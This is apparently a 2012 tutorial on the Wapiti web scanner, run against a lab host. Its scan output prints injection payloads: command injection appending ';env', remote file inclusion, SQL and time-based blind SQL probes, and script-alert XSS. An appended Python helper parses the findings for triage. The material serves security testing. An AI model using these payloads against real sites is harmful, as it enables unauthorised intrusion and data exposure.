Web Fuzzing: Wapiti
Posted on 2012-11-1 20:13:28
Features

Functions and features:
  File handling errors (local and remote file inclusion, readfile, ...)
  Database injection (PHP/JSP/ASP, SQL and XPath injection)
  XSS (cross-site scripting) injection
  LDAP injection
  Command execution detection (eval(), system(), passthru(), ...)
  CRLF injection (HTTP response splitting, session fixation, ...)
  Counts the number of vulnerabilities found
  Details of the successful attacks
  Vulnerability descriptions


Download

    root@Dis9Team:/pen/web# wget http://dis9-server.googlecode.com/files/wapiti-2.2.1.zip
    root@Dis9Team:/pen/web# unzip wapiti-2.2.1.zip
    root@Dis9Team:/pen/web# cd wapiti-2.2.1
    root@Dis9Team:/pen/web/wapiti-2.2.1# cd src/
    root@Dis9Team:/pen/web/wapiti-2.2.1/src# python wapiti.py
Default fuzz dictionaries

    ./config/attacks
    ./config/attacks/blindSQLPayloads.txt
    ./config/attacks/backupPayloads.txt
    ./config/attacks/fileHandlingPayloads.txt
    ./config/attacks/xssPayloads.txt
    ./config/attacks/execPayloads.txt
Bundled tool directory

    ./net/HTTP.pyc
    ./net/HTTP.py
    ./net/cookie.py
    ./net/libcookie.pyc
    ./net/getcookie.py
    ./net/crawlerpersister.pyc


Attack modules

    ./attack
    ./attack/mod_crlf.py
    ./attack/__init__.py
    ./attack/attack.py
    ./attack/mod_nikto.py
    ./attack/mod_sql.py
    ./attack/vulnerabilitiesdescriptions.py
    ./attack/mod_blindsql.py
    ./attack/mod_permanentxss.py
    ./attack/mod_file.py
    ./attack/mod_xss.py
    ./attack/mod_exec.py
    ./attack/mod_backup.py
    ./attack/mod_htaccess.py
Default scan of a site

It errors out under Python 2.7, so use 2.6. Unless you really need to, do not test mod_xss.


    root@Dis9Team:/pen/web/wapiti-2.2.1/src# python2.6 wapiti.py http://192.168.71.130/pen/
    Wapiti-2.2.1 (wapiti.sourceforge.net)
    ...................
    Notice
    ========
    This scan has been saved in the file /pen/web/wapiti-2.2.1/src/scans/192.168.71.130.xml
    You can use it to perform attacks without scanning again the web site with the "-k" parameter
    [*] Loading modules :
            mod_crlf, mod_exec, mod_file, mod_sql, mod_xss, mod_backup, mod_htaccess, mod_blindsql, mod_permanentxss, mod_nikto

The scan is saved as XML by default:

    This scan has been saved in the file /pen/web/wapiti-2.2.1/src/scans/192.168.71.130.xml

All modules are enabled:

    [*] Loading modules :
            mod_crlf, mod_exec, mod_file, mod_sql, mod_xss, mod_backup, mod_htaccess, mod_blindsql, mod_permanentxss, mod_nikto

Next it prints the links it fuzzes and what it found:

    [+] Launching module crlf

    [+] Launching module exec
    Command execution (ls) in http://192.168.71.130/pen/share/index.php
      Evil url: http://192.168.71.130/pen/share/index.php?ls=a%3Benv
    500 HTTP Error code with
      Evil url: http://192.168.71.130/pen/share/info.php?arg=a%29%3Benv

    [+] Launching module file
    Remote include (cat) in http://192.168.71.130/pen/file.php
      Evil url: http://192.168.71.130/pen/file.php?cat=http%3A%2F%2Fwww.google.fr%2F
    500 HTTP Error code with
      Evil url: http://192.168.71.130/pen/share/info.php?arg=http%3A%2F%2Fwww.google.fr%2F

    [+] Launching module sql
    MySQL Injection (id) in http://192.168.71.130/pen/news.php
      Evil url: http://192.168.71.130/pen/news.php?id=%BF%27%22%28
    500 HTTP Error code with
      Evil url: http://192.168.71.130/pen/share/info.php?arg=%BF%27%22%28

    [+] Launching module xss
    XSS (id) in http://192.168.71.130/pen/news.php
      Evil url: http://192.168.71.130/pen/news.php?id=%3Cscript%3Ealert%28%27xy4wvdn4q2%27%29%3C%2Fscript%3E
    Found XSS in http://192.168.71.130/pen/index.php
      with params = qq=z6e08ts7xm&message=qa830istr7&name=%3Cscript%3Ealert%28%27x4w4b72txg%27%29%3C%2Fscript%3E&submit=%CC%E1%BD%BB
      coming from http://192.168.71.130/pen/
    Found XSS in http://192.168.71.130/pen/index.php
      with params = qq=on&message=31gu0tcbad&name=%3Cscript%3Ealert%28%275e5k0g4g2l%27%29%3C%2Fscript%3E&submit=%CC%E1%BD%BB
      coming from http://192.168.71.130/pen/index.php?page=2

    [+] Launching module blindsql
    500 HTTP Error code with
      Evil url: http://192.168.71.130/pen/share/info.php?arg=sleep%287%29%23
    Blind SQL Injection in http://192.168.71.130/pen/post_con.php
      with params = pwd=%27+or+sleep%287%29%23&name=znokzwljbi
      coming from http://192.168.71.130/pen/
    Blind SQL Injection in http://192.168.71.130/pen/post_con.php
      with params = pwd=rz9gfvvroz&name=%27+or+sleep%287%29%23
      coming from http://192.168.71.130/pen/
    Blind SQL Injection in http://192.168.71.130/pen/post_con.php
      with params = pwd=%27+or+sleep%287%29%23&name=nyk49cmcmk
      coming from http://192.168.71.130/pen/index.php?page=2
    Blind SQL Injection in http://192.168.71.130/pen/post_con.php
      with params = pwd=on&name=%27+or+sleep%287%29%23
      coming from http://192.168.71.130/pen/index.php?page=2
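A small triage helper, added here and not part of Wapiti or of the original post, that parses the attack-phase output shown above into structured findings (module, type, URL, method, parameter, decoded payload) so they can be de-duplicated or handed to a tracker. The sample text is constructed in Wapiti 2.2.1's output format; the "500 HTTP Error code" entries are kept as anomalies rather than confirmed vulnerabilities, and picking the longest decoded form field as the injected one is an assumption based on the short random filler values in the log.

```python
import re
from urllib.parse import parse_qsl, urlsplit

SAMPLE = """[+] Launching module exec
Command execution (ls) in http://192.168.71.130/pen/share/index.php
  Evil url: http://192.168.71.130/pen/share/index.php?ls=a%3Benv
500 HTTP Error code with
  Evil url: http://192.168.71.130/pen/share/info.php?arg=a%29%3Benv
[+] Launching module xss
Found XSS in http://192.168.71.130/pen/index.php
  with params = qq=on&message=31gu0tcbad&name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
"""  # constructed sample in the format of Wapiti 2.2.1's attack-phase output

MODULE_RE = re.compile(r"^\[\+\] Launching module (\w+)$")
GET_RE = re.compile(r"^(.+?) \((\w+)\) in (\S+)$")         # "<type> (<param>) in <url>"
ERROR_RE = re.compile(r"^(\d{3}) HTTP Error code with$")   # anomaly, not a confirmed vuln
POST_RE = re.compile(r"^(?:Found )?(.+?) in (\S+)$")       # "[Found ]<type> in <url>" (forms)

def _new(findings, **fields):
    f = {"module": None, "type": None, "url": None, "method": "GET",
         "param": None, "payload": None, **fields}
    findings.append(f)
    return f

def _set_payload(f, query):
    # Use the parameter Wapiti named; for forms assume the longest decoded value is the payload.
    pairs = parse_qsl(query, keep_blank_values=True)
    if f["param"]:
        pairs = [p for p in pairs if p[0] == f["param"]] or pairs
    if pairs:
        f["param"], f["payload"] = max(pairs, key=lambda kv: len(kv[1]))

def parse_wapiti_log(text):
    # One dict per finding: module, type, url, method, param, decoded payload.
    findings, module, cur = [], None, None
    for line in (l.strip() for l in text.splitlines()):
        if m := MODULE_RE.match(line):
            module, cur = m.group(1), None
        elif m := GET_RE.match(line):
            cur = _new(findings, module=module, type=m.group(1), param=m.group(2), url=m.group(3))
        elif m := ERROR_RE.match(line):
            cur = _new(findings, module=module, type="HTTP " + m.group(1))
        elif m := POST_RE.match(line):
            cur = _new(findings, module=module, type=m.group(1), url=m.group(2), method="POST")
        elif cur and line.startswith("Evil url: "):
            parts = urlsplit(line[len("Evil url: "):])
            cur["url"] = parts._replace(query="").geturl()
            _set_payload(cur, parts.query)
        elif cur and line.startswith("with params = "):
            _set_payload(cur, line[len("with params = "):])
    return findings
```

Calling parse_wapiti_log(SAMPLE) yields three findings: the confirmed command execution on the ls parameter, the HTTP 500 anomaly on info.php, and the reflected XSS in the name form field.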

View the report once the scan has finished:

    ------
    A report has been generated in the file generated_report
    Open generated_report/index.html with a browser to see this report
    root@Dis9Team:/pen/web/wapiti-2.2.1/src# firefox generated_report/index.html



Custom report (output directory with -o, format with -f):

    root@Dis9Team:/pen/web/wapiti-2.2.1/src# python wapiti.py http://server.com/base/url/ -o 123 -f html


Debug mode (verbosity with -v)

    root@Dis9Team:/pen/web/wapiti-2.2.1/src# python2.6 wapiti.py http://192.168.71.130/pen/ -v 2
    Wapiti-2.2.1 (wapiti.sourceforge.net)

    http://192.168.71.130/pen/

    http://192.168.71.130/pen/news.php?id=1

    http://192.168.71.130/pen/file.php?cat=about.txt

    http://192.168.71.130/pen/share/index.php?ls=

    http://192.168.71.130/pen/share/info.php?arg=phpinfo();

    /pen/web/wapiti-2.2.1/src/net/lswww.py:294: UnicodeWarning: Unicode equal comparison failed to convert both arguments to Unicode - interpreting them as being unequal
      if form[0:3] not in [x[0:3] for x in self.forms]: self.forms.append(form)


Specifying modules

All modules: -m all. One or several, with the HTTP method to test: -m xss:get,exec:post. A full scan:

    python wapiti.py http://mysite.com -n 10 -b folder -u -v 1 -f html -o /tmp/scan_report





